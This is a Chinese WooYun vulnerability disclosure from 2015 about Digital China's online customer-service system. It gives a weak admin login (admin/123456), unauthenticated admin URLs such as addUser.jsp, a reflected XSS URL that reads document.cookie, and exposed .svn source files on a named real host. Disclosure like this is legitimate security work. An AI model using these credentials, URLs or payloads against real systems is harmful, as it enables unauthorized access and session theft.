神州数码在线客服系统弱口令+越权+xss+svn | wooyun-2015-0113150

漏洞概要关注数(24) 关注此漏洞

缺陷编号：

wooyun-2015-0113150

漏洞标题：

神州数码在线客服系统弱口令+越权+xss+svn

漏洞详情

披露状态：

2015-05-12：细节已通知厂商并且等待厂商处理中
2015-05-17：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

神州数码在线客服系统
RT
top.digitalchina.com

详细说明：

弱口令
在管理员神州数码管理员登录的页面

username:admin password:123456
这里可以很多管理员

越权访问
在这里我们可以添加管理员的！
http://top.digitalchina.com/chat/chat/admin/addUser.jsp

http://top.digitalchina.com/chat/chat/admin/editUser.jsp
http://top.digitalchina.com/chat/chat/admin/myAdmin.jsphttp://top.digitalchina.com/chat/chat/admin/userList.jsp
http://top.digitalchina.com/chat/chat/service/myServiceMain.jsp
http://top.digitalchina.com/chat/chat/service/myService.jsp
....
太多了
反射型xxs:
http://top.digitalchina.com/chat/login/loginClientError.jsp?msg=1'%22()%26%25<acx><ScRiPt%20>alert(document.cookie);</ScRiPt>

SVN
http://top.digitalchina.com/chat/chat/admin/.svn/text-base/addUser.jsp.svn-base

http://top.digitalchina.com/chat/chat/admin/.svn/text-base/addUser.jsp.svn-base
http://top.digitalchina.com/chat/chat/admin/.svn/text-base/myAdmin.jsp.svn-base
http://top.digitalchina.com/chat/chat/admin/.svn/text-base/userList.jsp.svn-base
http://top.digitalchina.com/chat/chat/client/.svn/text-base/clientChat.jsp.svn-base
http://top.digitalchina.com/chat/chat/service/.svn/text-base/myServiceMain.jsp.svn-base
.....
很多

漏洞证明：

弱口令
在管理员神州数码管理员登录的页面

username:admin password:123456
这里可以很多管理员

越权访问
在这里我们可以添加管理员的！
http://top.digitalchina.com/chat/chat/admin/addUser.jsp

SVN
http://top.digitalchina.com/chat/chat/admin/.svn/text-base/addUser.jsp.svn-base

修复方案：

你懂的

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2015-05-17 16:40

厂商回复：

漏洞Rank：4 (WooYun评价)

WooYun.org

漏洞概要关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

版权声明：转载请注明来源路人甲@乌云